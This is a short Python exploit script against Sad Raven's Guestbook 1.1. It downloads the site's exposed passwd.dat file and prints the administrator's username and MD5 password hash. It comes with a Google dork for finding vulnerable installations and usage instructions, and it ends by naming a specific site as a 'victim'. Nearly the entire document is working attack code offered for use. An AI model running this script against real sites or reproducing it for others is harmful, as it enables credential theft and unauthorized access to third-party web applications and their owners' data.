Sad Raven's Guestbook version 1.1 passwd.dat disclosure exploit.
78f2995ef2fb665ccd03d53422e9063d9a99a924ceaf680af30131ff3abf62ce
#!/usr/bin/python
#Portal Name: Sad Raven's Guestbook
#version: 1.1
#Google Dork: sad Raven's Guestbook
#Exploit Coded by: Pouya_Server
#Exploit Discovered by: Pouya_Server
#Contact Me: Pouya.s3rver@Gmail.com
import urllib
import sys
import parser
serv="http://"
i=0
for arg in sys.argv:
i=i+1
if i!=3:
print """\n\n
\tSad Raven's Guestbook v1.1 (passwd.dat)
\tUsage:exploit.py [targetsite] [path]
\tExample:exploit.py www.target.com /Path/
\tResult=$Password['Admin']="c71032e32b9ce349f99f655e68d7324g"
\t $Password['Admin Username']="Admin Password [MD5]" \n\n"""
else:
adres=sys.argv[1]
path=sys.argv[2]
str1=adres.join([serv,path])
str2=str1.join(['','/passwd.dat'])
print "\n[~]Connecting..."
url=urllib.urlopen(str2).read();
print "\n[+]Connected!"
test=url.find(path);
t=0;
print "\n\t\t\t-=[Admin Username and Password]=-"
while(url[test+1]!=1): # Pouya_Server
print url[test],
if(url[test]=='\n'):
t=t+1;
if(t==2):
break;
test=test+1;
print "\n\n\t\t\t[ Coded by Pouya_Server ]"
--------------------------------------------------
Victem :
http://djnixon.ru/guest/